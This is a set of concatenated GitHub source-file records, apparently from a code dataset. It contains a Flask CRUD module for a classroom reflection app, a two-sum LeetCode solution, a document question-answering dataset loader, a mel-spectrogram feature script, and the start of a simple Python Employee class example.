g_credentials=g_credentials)\n db.session.add(user)\n db.session.commit()\n return user\n\n\ndef create_section(name, start, end=None, g_id=None):\n section = Section(name=name, start_date=start, end_date=end, g_id=g_id)\n db.session.add(section)\n db.session.commit()\n return section\n\n\ndef create_section_assignment(user, section, role):\n seas = SectionAssignment(user=user, section=section, role=role)\n db.session.add(seas)\n db.session.commit()\n return seas\n\n\ndef create_section_assignment_by_ids(user_id, section_id, role):\n seas = SectionAssignment(user_id=user_id, section_id=section_id, role=role)\n db.session.add(seas)\n db.session.commit()\n return seas\n\n\ndef create_prompt(content, user=None, prompt_type='text', response_type='text'):\n prompt = Prompt(user=user,\n prompt_type=prompt_type,\n response_type=response_type,\n content=content)\n db.session.add(prompt)\n db.session.commit()\n return prompt\n\n\ndef create_custom_prompt(content, user_id, prompt_type='text', response_type='text'):\n prompt = Prompt(user_id=user_id,\n prompt_type=prompt_type,\n response_type=response_type,\n content=content)\n db.session.add(prompt)\n db.session.commit()\n return prompt\n\n\ndef create_prompt_assignment(section, prompt, due_date, g_id=None, revisit_pras_id=None):\n pras = PromptAssignment(section=section,\n prompt=prompt,\n due_date=due_date,\n g_id=g_id,\n revisit_pras_id=revisit_pras_id)\n db.session.add(pras)\n db.session.commit()\n return pras\n\n\ndef create_prompt_assignment_by_ids(section_id, prompt_id, due_date, g_id=None, revisit_pras_id=None):\n pras = PromptAssignment(section_id=section_id,\n prompt_id=prompt_id,\n due_date=due_date,\n g_id=g_id,\n revisit_pras_id=revisit_pras_id)\n db.session.add(pras)\n db.session.commit()\n return pras\n\n\ndef create_revisit_assignment(revisit_pras_id, date, g_id=None):\n old_pras = PromptAssignment.query.get(revisit_pras_id)\n section_id = old_pras.section_id\n prompt_id = old_pras.prompt_id\n new_pras = PromptAssignment(section_id=section_id,\n prompt_id=prompt_id,\n due_date=date,\n g_id=g_id,\n revisit_pras_id=revisit_pras_id)\n db.session.add(new_pras)\n db.session.commit()\n return (new_pras, old_pras.section.g_id)\n\n\ndef create_response(user, pras, content, sub_date, g_id=None):\n\n analysis = ml.classifiers.classify(\n model_id='cl_pi3C7JiL',\n data=[content]\n )\n print(analysis.body[0]['classifications'][0]['tag_name'])\n print(analysis.body[0]['classifications'][0]['confidence'])\n\n sentiment = analysis.body[0]['classifications'][0]['tag_name']\n confidence = analysis.body[0]['classifications'][0]['confidence']\n\n # sentiment = choice(['Positive', 'Negative', 'Neutral'])\n # confidence = random()\n\n response = Response(user=user,\n prompt_assignment=pras,\n content=content,\n submission_date=sub_date,\n g_id=g_id,\n sentiment=sentiment,\n confidence=confidence)\n db.session.add(response)\n db.session.commit()\n return response\n\n\ndef create_response_by_ids(user_id, pras_id, content, sub_date, g_id=None):\n analysis = ml.classifiers.classify(\n model_id='cl_Jx8qzYJh',\n data=[content]\n )\n print(analysis.body[0]['classifications'][0]['tag_name'])\n print(analysis.body[0]['classifications'][0]['confidence'])\n\n sentiment = analysis.body[0]['classifications'][0]['tag_name']\n confidence = analysis.body[0]['classifications'][0]['confidence']\n\n # sentiment = choice(['Positive', 'Negative', 'Neutral'])\n # confidence = random()\n \n response = Response(user_id=user_id,\n pras_id=pras_id,\n content=content,\n submission_date=sub_date,\n g_id=g_id,\n sentiment=sentiment,\n confidence=confidence)\n db.session.add(response)\n db.session.commit()\n return response\n\n\n# 'read' functions\ndef get_user_by_email(email):\n return User.query.filter(User.email == email).first()\n\n\ndef get_sections_by_user_id(user_id):\n assignments = (SectionAssignment.query\n .options(db.joinedload('section'))\n .filter(SectionAssignment.user_id == user_id)\n .all())\n sections = [(assignment.section, assignment.role)\n for assignment in assignments]\n return sections\n\n\ndef get_section_name(section_id):\n section = Section.query.get(section_id)\n return section.name\n\n\ndef get_assignments_by_section_id(section_id):\n condition = (PromptAssignment.section_id == section_id)\n assignments = (PromptAssignment.query\n .filter(condition)\n .all())\n return assignments\n\n\ndef get_students_by_section_id(section_id):\n condition1 = (SectionAssignment.section_id == section_id)\n condition2 = (SectionAssignment.role == 'student')\n students = (SectionAssignment.query\n .options(db.joinedload('user'))\n .filter(condition1, condition2)\n .all())\n students_info = []\n for student in students:\n students_info.append({'user_id': student.user_id,\n 'first_name': student.user.first_name,\n 'last_name': student.user.last_name})\n return students_info\n\n\ndef get_assignments_to_date(section_id, date):\n condition1 = (PromptAssignment.section_id == section_id)\n condition2 = (PromptAssignment.due_date <= date)\n assignments = (PromptAssignment.query\n .filter(condition1, condition2)\n .all())\n return assignments\n\n\ndef get_pras_date(pras_id):\n pras = PromptAssignment.query.get(pras_id)\n return pras.due_date\n\n\ndef get_responses_by_assignment_id(assignment_id):\n pras = PromptAssignment.query.get(assignment_id)\n prompt_content = pras.prompt.content\n prompt_id = pras.prompt_id\n due_date = pras.due_date\n if pras.revisit_pras_id is not None:\n revisit = True\n orig_date = get_pras_date(pras.revisit_pras_id)\n else:\n revisit = False\n orig_date = None\n # get existing responses\n responses = (Response.query\n .options(db.joinedload('prompt_assignment'),\n db.joinedload('user'))\n .filter(Response.pras_id == assignment_id)\n .all())\n\n # if no responses yet, return\n if responses == []:\n return [prompt_content, prompt_id, due_date, revisit, orig_date, []]\n\n # get students\n condition1 = (SectionAssignment.section_id == pras.section_id)\n condition2 = (SectionAssignment.role == 'student')\n seaction_assignments = (SectionAssignment.query\n .options(db.joinedload('user'))\n .filter(condition1, condition2)\n .all())\n students = []\n for seas in seaction_assignments:\n students.append(seas.user)\n\n # re-format responses\n res_info = []\n for res in responses:\n name = f'{res.user.first_name} {res.user.last_name}'\n res_info.append({'student': name,\n 'last_name': res.user.last_name,\n 'content': res.content,\n 'sentiment': res.sentiment,\n 'confidence': res.confidence,\n 'date': res.submission_date})\n if res.user in students:\n students.remove(res.user)\n\n # add in students who have not responded yet\n for student in students:\n name = f'{student.first_name} {student.last_name}'\n res_info.append({'student': name,\n 'last_name': student.last_name,\n 'content': 'No response yet.'})\n return [prompt_content, prompt_id, due_date, revisit, orig_date, res_info]\n\n\ndef get_pras_by_section_id(section_id):\n return (PromptAssignment.query\n .filter(PromptAssignment.section_id == section_id)\n .all())\n\n\ndef get_responses_by_student_and_section(student_id, section_id):\n prompt_assignments = get_pras_by_section_id(section_id)\n responses = []\n condition1 = (Response.user_id == student_id)\n for pras in prompt_assignments:\n condition2 = (Response.prompt_assignment == pras)\n res = (Response.query\n .filter(condition1, condition2)\n .first())\n if res:\n responses.append({'date': res.submission_date,\n 'prompt': pras.prompt.content,\n 'response': res.content,\n 'sentiment': res.sentiment,\n 'confidence': res.confidence})\n return responses\n\n\ndef get_response(pras_id, user_id):\n condition1 = (Response.pras_id == pras_id)\n condition2 = (Response.user_id == user_id)\n response = Response.query.filter(condition1, condition2).first()\n return response\n\n\ndef get_orig_res(pras_id, user_id):\n pras = PromptAssignment.query.get(pras_id)\n orig_pras = PromptAssignment.query.get(pras.revisit_pras_id)\n res = (Response.query\n .filter(Response.user_id == user_id,\n Response.pras_id == orig_pras.pras_id)\n .first())\n if res:\n return res.content\n else:\n return 'No response submitted'\n\n\ndef check_response(pras_id, user_id):\n condition1 = (Response.pras_id == pras_id)\n condition2 = (Response.user_id == user_id)\n response = Response.query.filter(condition1, condition2).first()\n if response:\n return True\n else:\n return False\n\n\ndef get_all_prompts(user_id):\n condition1 = (Prompt.user_id == user_id)\n condition2 = (Prompt.user_id == None)\n return Prompt.query.filter(condition1 | condition2).all()\n\n\ndef get_teacher_assignments():\n teacherAssignments = (SectionAssignment.query\n .options(db.joinedload('user'))\n .filter(SectionAssignment.role == 'teacher')\n .all())\n teachers = []\n for teas in teacherAssignments:\n teachers.append(teas.user)\n return teachers\n\n\ndef get_users_with_section_info():\n users = User.query.all()\n users_info = []\n for user in users:\n name = f'{user.first_name} {user.last_name}'\n user_sections = []\n sections = (SectionAssignment.query\n .filter(SectionAssignment.user_id == user.user_id)\n .all())\n for seas in sections:\n user_sections.append({'name': seas.section.name,\n 'id': seas.section.section_id,\n 'role': seas.role})\n users_info.append({'name': name,\n 'id': user.user_id,\n 'sections': user_sections})\n return users_info\n\n\ndef check_pras_date(section, date):\n pras = (PromptAssignment.query\n .filter(PromptAssignment.section == section,\n PromptAssignment.due_date == date)\n .first())\n if pras:\n return True\n else:\n return False\n\n\ndef get_user_by_gid(g_id):\n return User.query.filter(User.g_id == g_id).first()\n\n\ndef get_user_gid(user_id):\n user = User.query.get(user_id)\n if user:\n return user.g_id\n else:\n return None\n\n\ndef get_course_by_gid(g_id):\n return Section.query.filter(Section.g_id == g_id).first()\n\n\ndef get_seas(user, section):\n condition1 = (SectionAssignment.user == user)\n condition2 = (SectionAssignment.section == section)\n return SectionAssignment.query.filter(condition1, condition2).first()\n\n\ndef get_section(section_id):\n return Section.query.get(section_id)\n\n\ndef get_prompt(prompt_id):\n return Prompt.query.get(prompt_id)\n\n\ndef get_gid_of_section(section_id):\n section = get_section(section_id)\n return section.g_id\n\n\ndef get_credentials(user_id):\n user = User.query.get(user_id)\n return user.g_credentials\n\n\ndef get_prompt_content(prompt_id):\n prompt = Prompt.query.get(prompt_id)\n return prompt.content\n\n\ndef get_gid_of_pras(pras_id):\n pras = PromptAssignment.query.get(pras_id)\n return pras.g_id\n\n\ndef get_section_id_of_pras(pras_id):\n pras = PromptAssignment.query.get(pras_id)\n return pras.section_id\n\n\n# update functions\ndef update_user_with_gid(user, gid, credentials):\n user.g_id = gid\n user.g_credentials = credentials\n db.session.commit()\n return user\n\n\ndef update_user_at_first_login(user, first, last, password):\n hashed_password = bcrypt.generate_password_hash(password).decode('utf-8')\n user.first_name = first\n user.last_name = last\n user.hashed_password = hashed_password\n db.session.commit()\n return user\n\n\ndef update_revisit_assignment(revisit, google_prasid):\n revisit.g_id = google_prasid\n db.session.commit()\n return revisit\n\n\nif __name__ == '__main__':\n from server import app\n connect_to_db(app)\n","repo_name":"ericachesley/metacognizant","sub_path":"crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":14658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1453738261","text":"# 给定一个已按照升序排列 的有序数组,找到两个数使得它们相加之和等于目标数。\n#\n# 函数应该返回这两个下标值 index1 和 index2,其中 index1 必须小于 index2。\n#\n# 说明:\n# 返回的下标值(index1 和 index2)不是从零开始的。\n# 你可以假设每个输入只对应唯一的答案,而且你不可以重复使用相同的元素。\n# 示例:\ntest1 = [0, 0, 3, 4]\ntest = [2, 7, 11, 15]\nsum = 0\n\n\n# 输出: [1,2]\n# 解释: 2 与 7 之和等于目标数 9 。因此 index1 = 1, index2 = 2 。\n\n\ndef twoSum(numbers, target):\n dict = {}\n for i in range(len(numbers)):\n dict[numbers[i]] = i\n for j in range(len(numbers)):\n tmp = target - numbers[j]\n if tmp in dict and dict[tmp] != j:\n return [j, dict[tmp]]\n\n return False\n\n\ntwoSum(test1, sum)\n","repo_name":"nexusme/leetcode_try","sub_path":"LeetCode/twoSumII.py","file_name":"twoSumII.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23097881683","text":"import torch.utils.data\nimport numpy as np\nimport json\nimport os\nimport math, random\nfrom utils.crop_transform import CropBoxTransform\nfrom utils import augmentation\nfrom collections import defaultdict, OrderedDict\nfrom utils.forms_annotations import convertBBs\n\nimport utils.img_f as img_f\n\n#This collate function is for any child class of QADataset\ndef collate(batch):\n if any(b['mask_label'] is not None for b in batch):\n mask_labels = []\n mask_labels_batch_mask = torch.FloatTensor(len(batch))\n for bi,b in enumerate(batch):\n if b['mask_label'] is None:\n mask_labels_batch_mask[bi]=00\n mask_labels.append( torch.FloatTensor(1,1,b['img'].shape[2],b['img'].shape[3]).fill_(0))\n else:\n mask_labels_batch_mask[bi]=1\n mask_labels.append( b['mask_label'] )\n mask_labels = torch.cat(mask_labels,dim=0)\n else:\n mask_labels = None\n mask_labels_batch_mask = None\n\n return {\n 'img': torch.cat([b['img'] for b in batch],dim=0),\n 'imgName': [b.get('imgName') for b in batch],\n 'id': [b.get('id') for b in batch],\n 'scale': [b.get('scale') for b in batch],\n 'cropPoint': [b.get('cropPoint') for b in batch],\n 'questions': [b.get('questions') for b in batch],\n 'answers': [b.get('answers') for b in batch],\n 'metadata': [b.get('metadata') for b in batch],\n 'mask_label': mask_labels,\n 'mask_labels_batch_mask': mask_labels_batch_mask,\n \"bart_logits\": torch.cat([b['bart_logits'] for b in batch],dim=0) if 'bart_logits' in batch[0] else None,\n \"bart_last_hidden\": torch.cat([b['bart_last_hidden'] for b in batch],dim=0) if 'bart_last_hidden' in batch[0] else None,\n \"distill_loss_mask\": torch.cat([b['distill_loss_mask'] for b in batch],dim=0) if 'distill_loss_mask' in batch[0] and batch[0]['distill_loss_mask'] is not None else None,\n \"noise_token_mask\": torch.cat([b['noise_token_mask'] for b in batch],dim=0) if 'noise_token_mask' in batch[0] and batch[0]['noise_token_mask'] is not None else None,\n }\n\n#Make a mask channel\ndef getMask(shape,boxes):\n mask = torch.FloatTensor(1,1,shape[2],shape[3]).fill_(0)\n for box in boxes:\n if isinstance(box,list):\n box = np.array(box)\n points = box[0:8].reshape(4,2)\n img_f.fillConvexPoly(mask[0,0],points,1)\n return mask\n\n#Parent class of almost all datasets used by Dessurt\n#It defines the augmentation and prepares the data (masks and such)\n#Dessurt works with a query input and respose, or Question and Answer\nclass QADataset(torch.utils.data.Dataset):\n\n\n def __init__(self, dirPath=None, split=None, config=None, images=None):\n self.train = split=='train'\n self.questions = config.get('questions',1)\n self.max_qa_len_in = config['max_qa_len_in'] if 'max_qa_len_in' in config else None\n self.max_qa_len_out = config['max_qa_len_out'] if 'max_qa_len_out' in config else None\n if self.max_qa_len_in is None and self.max_qa_len_out is None and 'max_qa_len' in config:\n self.max_qa_len_in = config['max_qa_len']\n self.max_qa_len_out = config['max_qa_len']\n\n self.cased = config.get('cased',True)\n\n self.color = config['color'] if 'color' in config else False #everything with Dessurt is done with grayscale images\n self.rotate = config['rotation'] if 'rotation' in config else False #wether BBs are not axis aligned, not really used\n\n if 'crop_params' in config and config['crop_params'] is not None:\n self.transform = CropBoxTransform(config['crop_params'],self.rotate)\n else:\n self.transform = None\n\n self.rescale_range = config['rescale_range']\n self.rescale_to_crop_size_first = config['rescale_to_crop_size_first'] if 'rescale_to_crop_size_first' in config else False\n self.rescale_to_crop_width_first = config['rescale_to_crop_width_first'] if 'rescale_to_crop_width_first' in config else False\n self.rescale_to_crop_height_first = config['rescale_to_crop_height_first'] if 'rescale_to_crop_height_first' in config else False\n if self.rescale_to_crop_size_first or self.rescale_to_crop_width_first or self.rescale_to_crop_height_first:\n self.crop_size = config['crop_params']['crop_size']\n if type(self.rescale_range) is float:\n self.rescale_range = [self.rescale_range,self.rescale_range]\n\n self.rearrange_tall_images = False #used by HW-SQuAD\n\n if 'cache_resized_images' in config:\n #This wasn't used for any of Dessurt's stuff\n self.cache_resized = config['cache_resized_images']\n if self.cache_resized:\n if self.rescale_to_crop_size_first:\n self.cache_path = os.path.join(dirPath,'cache_match{}x{}'.format(*config['crop_params']['crop_size']))\n elif self.rescale_to_crop_width_first:\n self.cache_path = os.path.join(dirPath,'cache_matchHx{}'.format(config['crop_params']['crop_size'][1]))\n else:\n assert not self.rescale_to_crop_width_first\n self.cache_path = os.path.join(dirPath,'cache_'+str(self.rescale_range[1]))\n if not os.path.exists(self.cache_path):\n os.mkdir(self.cache_path)\n else:\n self.cache_resized = False\n\n self.augment_shade = config['augment_shade'] if 'augment_shade' in config else False #Do brightness/contrast augmentation\n self.aug_params = config['additional_aug_params'] if 'additional_aug_params' in config else {}\n\n\n self.do_masks=True\n\n #These are based on EasyOCR, which I did some experiments with\n self.ocr_out_dim = 97\n self.char_to_ocr = \"0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ €ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\"\n self.char_to_ocr = {char:i+1 for i,char in enumerate(self.char_to_ocr)} #+1 as 0 is the blank token\n self.one_hot_conf = 0.9\n\n\n self.crop_to_data = False\n self.crop_to_q = config.get('crop_to_q',False) #Used for training recognition on NAF\n if self.crop_to_q: \n self.min_text_height = config['min_text_height'] #Min text height in rescaling\n\n\n\n\n def __len__(self):\n return len(self.images)\n\n\n #helper function for adding a question-answer pair\n def qaAdd(self,qa,question,answer,bb_ids=None,in_bbs=[],out_bbs=None,mask_bbs=[],noise_token_mask=None):\n #aif all([(pair['question']!=question or for pair in qa]): #prevent duplicate q\n qa.append({\n 'question':question,\n 'answer':answer,\n 'bb_ids':bb_ids,\n 'in_bbs':in_bbs,\n 'out_bbs':out_bbs,\n 'mask_bbs':mask_bbs,\n 'noise_token_mask':noise_token_mask\n })\n\n def __getitem__(self,index):\n return self.getitem(index)\n def getitem(self,index,scaleP=None,cropPoint=None):\n imagePath = self.images[index]['imagePath']\n imageName = self.images[index].get('imageName',imagePath)\n\n annotationPath = self.images[index]['annotationPath']\n #This was originally just the json, but as different datasets have different data, it can be something else\n \n rescaled = self.images[index].get('rescaled',1)\n if isinstance(annotationPath,str) and annotationPath.endswith('.json'):\n try: \n with open(annotationPath) as annFile:\n annotations = json.loads(annFile.read())\n if isinstance(annotations,dict):\n annotations['XX_imageName']=imageName #so I have it\n except FileNotFoundError:\n print(\"ERROR, could not open \"+annotationPath)\n return self.__getitem__((index+1)%self.__len__())\n except json.decoder.JSONDecodeError as e:\n print(e)\n print('Error reading '+annotationPath)\n return self.__getitem__((index+1)%self.__len__())\n else:\n annotations=annotationPath\n\n #Load image\n if imagePath is not None:\n try:\n np_img = img_f.imread(imagePath, 1 if self.color else 0)#*255.0\n except FileNotFoundError as e:\n print(e)\n print('ERROR, could not find: '+imagePath)\n return self.__getitem__((index+1)%self.__len__())\n if np_img is None or np_img.shape[0]==0:\n print(\"ERROR, could not open \"+imagePath)\n return self.__getitem__((index+1)%self.__len__())\n if np_img.max()<=1:\n np_img*=255\n else:\n np_img = None #will get generated from parseAnn\n\n\n if self.crop_to_data:\n #This is used for the IAM dataset so we don't include the form prompt text (which would be easy to cheat from)\n #This is used by the NAF dataset to sometimes cut landscape documents in half to have better resolution\n crop, line_bbs = self.getCropAndLines(annotations,np_img.shape)\n x1,y1,x2,y2 = crop\n np_img = np_img[y1:y2,x1:x2]\n \n if self.warp_lines is not None and random.random()scale:\n #The scale is better, so actually to the transformation\n left = np_img[:np_img.shape[0]//2]\n right = np_img[np_img.shape[0]//2:]\n if right.shape[0]>left.shape[0]:\n left = np.pad(left,(0,1))\n np_img = np.concatenate((left,right),axis=1)\n #recompute scale\n scale_height = self.crop_size[0]/np_img.shape[0]\n scale_width = self.crop_size[1]/np_img.shape[1]\n scale = min(scale_height, scale_width)\n \n #Note, this did not change any bounding boxes. This means it can only be used on a dataset that doesn't use bounding boxes (like a question-answering dataset)\n\n partial_rescale = s*scale\n s=partial_rescale\n\n elif self.rescale_to_crop_width_first:\n if rescaled!=1:\n raise NotImplementedError('havent implemented caching with match resizing')\n scale = self.crop_size[1]/np_img.shape[1]\n partial_rescale = s*scale\n s=partial_rescale\n elif self.rescale_to_crop_height_first:\n if rescaled!=1:\n raise NotImplementedError('havent implemented caching with match resizing')\n scale = self.crop_size[0]/np_img.shape[0]\n partial_rescale = s*scale\n s=partial_rescale\n else:\n partial_rescale = s/rescaled\n \n\n #Parse annotation file\n bbs,ids, gen_img, metadata, questions_and_answers = self.parseAnn(annotations,s)\n if bbs is None:\n assert ids is None\n bbs = np.zeros(0)\n ids = []\n\n if self.crop_to_q:\n #crop the image to focus on the text line related to the question\n questions_and_answers = self.images[index]['qa']\n assert len(questions_and_answers)==1\n qa = questions_and_answers[0]\n assert len(qa['in_bbs'])==1\n bb = qa['in_bbs'][0]\n assert len(bb)==16\n bb_height = math.sqrt( ((bb[-4]-bb[-2])**2) + ((bb[-3]-bb[-1])**2) )\n bb_width = math.sqrt( ((bb[-8]-bb[-6])**2) + ((bb[-7]-bb[-5])**2) )\n if bb_height*s < self.min_text_height:\n s=partial_rescale = self.min_text_height/bb_height\n\n if s*bb_width>self.crop_size[1]:\n s=partial_rescale = self.crop_size[1]/bb_width\n \n bb_x = bb[-4]*s\n bb_y = bb[1]*s\n cropPoint_x = max(0,round(bb_x-self.crop_size[1]/2))\n cropPoint_y = max(0,round(bb_y-self.crop_size[0]/2))\n\n if cropPoint_x + self.crop_size[1]>int(s*np_img.shape[1]):\n cropPoint_x -= cropPoint_x + self.crop_size[1] - s*np_img.shape[1]\n if cropPoint_x<0:\n cropPoint_x = 0\n if cropPoint_y + self.crop_size[0]>int(s*np_img.shape[0]):\n cropPoint_y -= cropPoint_y + self.crop_size[0] - s*np_img.shape[0]\n if cropPoint_y<0:\n cropPoint_y = 0\n\n cropPoint = (int(cropPoint_x),int(cropPoint_y))\n \n if (not self.train or self.crop_to_q) and 'qa' in self.images[index]:\n #override questions_and_answers returned by parseAnn\n questions_and_answers = self.images[index]['qa']\n #But the scale doesn't match! So fix it\n for qa in questions_and_answers:\n for bb_name in ['in_bbs','out_bbs','mask_bbs']:\n if qa[bb_name] is not None:\n qa[bb_name] = [ [s*v for v in bb] for bb in qa[bb_name] ]\n \n\n\n\n if np_img is None:\n np_img=gen_img #generated image\n\n if partial_rescale!=1:\n np_img = img_f.resize(np_img,(0,0),\n fx=partial_rescale,\n fy=partial_rescale,\n )\n\n\n if len(np_img.shape)==2:\n np_img=np_img[...,None] #add 'color' channel\n if self.color and np_img.shape[2]==1:\n np_img = np.repeat(np_img,3,axis=2) #make color image\n \n #set up for cropping\n # The cropping needs to be aware of bounding boxes\n outmasks=False\n if self.do_masks:\n assert self.questions==1 #only allow 1 qa pair if using masking\n mask_bbs=[]\n mask_ids=[]\n for i,qa in enumerate(questions_and_answers):\n inmask_bbs = qa['in_bbs']\n outmask_bbs = qa['out_bbs']\n blank_bbs = qa['mask_bbs']\n if outmask_bbs is not None:\n outmasks=True\n mask_bbs+=inmask_bbs+outmask_bbs+blank_bbs\n mask_ids+= ['in{}_{}'.format(i,ii) for ii in range(len(inmask_bbs))] + \\\n ['out{}_{}'.format(i,ii) for ii in range(len(outmask_bbs))] + \\\n ['blank{}_{}'.format(i,ii) for ii in range(len(blank_bbs))]\n else:\n mask_bbs+=inmask_bbs+blank_bbs\n mask_ids+= ['in{}_{}'.format(i,ii) for ii in range(len(inmask_bbs))] + \\\n ['blank{}_{}'.format(i,ii) for ii in range(len(blank_bbs))]\n\n mask_bbs = np.array(mask_bbs)\n\n #Do crop\n if self.transform is not None:\n if self.do_masks and len(mask_bbs.shape)==2:\n if (bbs is not None and bbs.shape[0]>0) and mask_bbs.shape[0]>0:\n crop_bbs = np.concatenate([bbs,mask_bbs])\n elif mask_bbs.shape[0]>0:\n crop_bbs = mask_bbs\n else:\n crop_bbs = bbs\n crop_ids = ids+mask_ids\n else:\n crop_bbs = bbs\n crop_ids = ids\n\n out, cropPoint = self.transform({\n \"img\": np_img,\n \"bb_gt\": crop_bbs[None,...],\n 'bb_auxs':crop_ids,\n \n }, cropPoint)\n np_img = out['img'] #cropped image\n\n\n #Get the adjusted bounding boxes\n new_q_inboxes=defaultdict(list)\n if outmasks:\n new_q_outboxes=defaultdict(list)\n else:\n new_q_outboxes=None\n new_q_blankboxes=defaultdict(list)\n new_recog_boxes={}\n if self.do_masks:\n orig_idx=0\n for ii,(bb_id,bb) in enumerate(zip(out['bb_auxs'],out['bb_gt'][0])):\n if type(bb_id) is int:\n assert orig_idx==ii\n orig_idx+=1\n elif bb_id.startswith('in'):\n nums = bb_id[2:].split('_')\n i=int(nums[0])\n new_q_inboxes[i].append(bb)\n elif bb_id.startswith('out'):\n nums = bb_id[3:].split('_')\n i=int(nums[0])\n new_q_outboxes[i].append(bb)\n elif bb_id.startswith('blank'):\n nums = bb_id[5:].split('_')\n i=int(nums[0])\n new_q_blankboxes[i].append(bb)\n elif bb_id.startswith('recog'):\n i=int(bb_id[5:])\n new_recog_boxes[i]=bb\n bbs = out['bb_gt'][0,:orig_idx]\n ids= out['bb_auxs'][:orig_idx]\n\n #Put boxes back in questions_and_answers\n for i in range(len(questions_and_answers)):\n questions_and_answers[i]['in_bbs'] = new_q_inboxes[i]\n if outmasks:\n questions_and_answers[i]['out_bbs'] = new_q_outboxes[i]\n questions_and_answers[i]['mask_bbs'] = new_q_blankboxes[i]\n else:\n bbs = out['bb_gt'][0]\n ids= out['bb_auxs']\n\n\n if questions_and_answers is not None:\n questions=[]\n answers=[]\n questions_and_answers = [qa for qa in questions_and_answers if qa['bb_ids'] is None or all((i in ids) for i in qa['bb_ids'])] #filter out q-a pairs that were cropped out\n\n if questions_and_answers is not None:\n if len(questions_and_answers) > self.questions:\n #select the q-a pairs used for this image\n #Dessurt only uses 1 q-a pairs, as each could have a different input mask\n questions_and_answers = random.sample(questions_and_answers,k=self.questions)\n if len(questions_and_answers)==0:\n #Had no questions...\n #weird crops might cause this\n return self.getitem((index+1)%len(self))\n \n new_q_inboxes= [qa['in_bbs'] for qa in questions_and_answers]\n new_q_outboxes= [qa['out_bbs'] for qa in questions_and_answers]\n new_q_blankboxes= [qa['mask_bbs'] for qa in questions_and_answers]\n if self.cased:\n questions = [qa['question'] for qa in questions_and_answers]\n answers = [qa['answer'] for qa in questions_and_answers]\n else:\n questions = [qa['question'].lower() for qa in questions_and_answers]\n answers = [qa['answer'].lower() for qa in questions_and_answers]\n\n if questions_and_answers[0]['noise_token_mask'] is not None:\n assert len(questions_and_answers)==1\n noise_token_mask = questions_and_answers[0]['noise_token_mask']\n else:\n noise_token_mask = None\n else:\n questions=answers=noise_token_mask=None\n\n\n\n\n if self.augment_shade and self.augment_shade>random.random():\n if np_img.shape[2]==3:\n np_img = augmentation.apply_random_color_rotation(np_img)\n np_img = augmentation.apply_tensmeyer_brightness(np_img,**self.aug_params)\n else:\n np_img = augmentation.apply_tensmeyer_brightness(np_img,**self.aug_params)\n\n img = np_img.transpose([2,0,1])[None,...] #from [row,col,color] to [batch,color,row,col]\n img = img.astype(np.float32)\n img = torch.from_numpy(img)\n img = 1.0 - img / 128.0 #ideally the median value would be 0\n\n if self.do_masks:\n assert len(new_q_inboxes)<=1\n assert new_q_outboxes is None or len(new_q_outboxes)<=1\n\n mask = getMask(img.shape,new_q_inboxes[0])\n img = torch.cat((img,mask),dim=1)\n for blank_box in new_q_blankboxes[0]:\n assert(img.shape[1]==2)\n x1,y1,x2,y2,x3,y3,x4,y4 = blank_box[:8]\n img_f.polylines(img[0,0],np.array([(x1,y1),(x2,y2),(x3,y3),(x4,y4)]),True,0) #blank on image\n img_f.polylines(img[0,-1],np.array([(x1,y1),(x2,y2),(x3,y3),(x4,y4)]),True,-1) #flip mask to indicate it was blanked\n\n if outmasks and new_q_outboxes[0] is not None:\n mask_label = getMask(img.shape,new_q_outboxes[0])\n else:\n mask_label = None\n else:\n mask_label = None\n\n\n if bbs is not None:\n bbs = convertBBs(bbs[None,...],self.rotate,0)\n if bbs is not None:\n bbs=bbs[0]\n else:\n bbs = torch.FloatTensor(1,0,5+8+1)\n else:\n bbs = torch.FloatTensor(1,0,5+8+1)\n\n\n\n \n\n return {\n \"img\": img,\n \"imgName\": imageName,\n \"id\": self.images[index].get('id'),\n \"scale\": s,\n \"cropPoint\": cropPoint,\n \"questions\": questions,\n \"answers\": answers,\n \"noise_token_mask\": noise_token_mask,\n \"mask_label\": mask_label,\n \"metadata\": metadata\n }\n\n\n","repo_name":"herobd/dessurt","sub_path":"data_sets/qa.py","file_name":"qa.py","file_ext":"py","file_size_in_byte":22373,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"21"} +{"seq_id":"1011865327","text":"\"\"\" mel-spectrogram 계산 \"\"\"\nimport librosa\n\nimport numpy as np\nimport os\nimport csv\nimport warnings\nwarnings.filterwarnings(action='ignore')\n\n\ndef calc_spec(filename):\n # 계산 parameters\n offset = 0\n n_fft = 512\n hop_length = 513\n\n speech = f'./{filename}.wav'\n # y : 1차원 numpy float array, 음원 파형 데이터\n # sr : sample rate(초당 샘플링 횟수), default = 22050Hz\n y, sr = librosa.load(speech, mono=True, sr=16000)\n # 파일 앞, 뒤의 무음 제거, yt: 제거 후 신호 / _: (자른 길이, y 길이)\n # top_db: 낮을 수록 덜 민감 -> 작은 noise 도 무음으로 인식 -> 더 많이 제거 (max - top_db 만큼을 무음으로 간주)\n yt, _ = librosa.effects.trim(y, top_db=20)\n y = yt\n\n spectrogram = librosa.feature.melspectrogram(y, sr=sr, n_fft=n_fft, hop_length=hop_length, n_mels=23)\n spectrogram_db = librosa.power_to_db(spectrogram)\n\n filename1 = filename.replace(\" \", \"\") # 파일명 공백제거\n to_append = {filename1[:-4]}\n # 평균 계산, 입력\n for e in spectrogram_db:\n to_append = np.append(to_append, np.mean(e))\n # 분산 계산, 입력\n for e in spectrogram_db:\n to_append = np.append(to_append, np.var(e))\n\n input_spec = to_append\n\n return input_spec\n\n\n\n","repo_name":"chs98412/capstone","sub_path":"api/spec.py","file_name":"spec.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28537591613","text":"class Employee:\n def __init__(self, first, last, age, sal):\n self.first = first\n self.last = last\n self.age = age\n self.sal = sal\n self.email = first + '.' + last + '@gmail.com'\n\n def marks(self, sub1, sub2, sub3):\n self.sub1 = sub1\n self.sub2 = sub2\n self.sub3 = sub3\n self.total = sub1 + sub2 + sub3\n return self.total\n\n\nemp1 = Employee('san', 'kumar', 13, 50000)\nemp2 = Employee('sanjay', 'kr', 26, 50000)\n\nprint(emp1.email)\nprint('Firstname: {} Lastname: {} Age: {} Email: 